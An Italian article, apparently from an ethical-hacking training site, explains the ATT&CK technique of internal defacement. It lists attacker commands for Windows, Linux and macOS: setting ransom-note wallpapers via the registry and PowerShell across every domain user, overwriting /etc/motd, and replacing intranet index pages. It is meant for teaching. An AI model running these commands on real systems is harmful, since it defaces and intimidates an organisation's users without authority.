Sfiguramento Interno: Internal Defacement (T1491.001)
Il defacement interno rappresenta una delle tecniche più viscerali di cyberwarfare psicologica. L'avversario modifica elementi visivi dei sistemi aziendali per intimidire gli utenti, sostituendo wallpaper desktop, messaggi di login o contenuti di siti intranet con immagini disturbanti o messaggi minacciosi.
Questa tecnica si colloca esclusivamente nella fase Impact (TA0040) della kill chain, quando l'attaccante ha già raggiunto i propri obiettivi primari e decide di manifestare apertamente la propria presenza. La scelta di defacciare sistemi interni non è casuale: mira a minare la fiducia degli utenti nell'integrità dell'infrastruttura IT.
I numeri parlano chiaro: 3 gruppi APT hanno utilizzato questa tattica, supportati da 9 diversi malware specializzati. La maggioranza sono ransomware che combinano encryption e defacement per massimizzare l'impatto psicologico sulla vittima.
Il defacement interno richiede privilegi elevati già ottenuti. Su Windows, la modifica del wallpaper desktop può avvenire attraverso registry o PowerShell:
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\ransom_note.bmp" /f
Per forzare l'aggiornamento immediato del desktop senza riavvio, combina il comando precedente con:
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
Su sistemi Linux, l'approccio varia in base al desktop environment. Per GNOME, utilizza gsettings:
gsettings set org.gnome.desktop.background picture-uri "file:///tmp/defaced.png"
La modifica dei banner di login richiede accesso root. Il file /etc/motd controlla il messaggio post-login su tutti i sistemi Unix-like:
echo "YOUR SYSTEM HAS BEEN COMPROMISED" > /etc/motd
Per sistemi web interni, la sostituzione dell'index.html rappresenta l'approccio più diretto. Su Apache/Nginx standard:
cp defacement.html /var/www/html/index.html
Gli attaccanti sofisticati automatizzano il processo attraverso script che iterano su tutti gli utenti del dominio. PowerShell offre capacità native per questo:
Get-ADUser -Filter * | ForEach-Object { Set-ItemProperty -Path "Registry::HKEY_USERS$($_.SID)\Control Panel\Desktop" -Name Wallpaper -Value "\fileserver\share\ransom.jpg" }
Su macOS, AppleScript permette modifiche desktop programmatiche:
osascript -e 'tell application "Finder" to set desktop picture to POSIX file "/tmp/defaced.jpg"'
L'aspetto più insidioso riguarda la persistenza delle modifiche. Molti ransomware creano task schedulati che ripristinano il wallpaper modificato anche dopo tentativi di rimozione manuale.
Vuoi diventare un Ethical Hacker ma non sai da dove iniziare?
Scarica la guida gratuita e segui il percorso corretto fin dal primo passo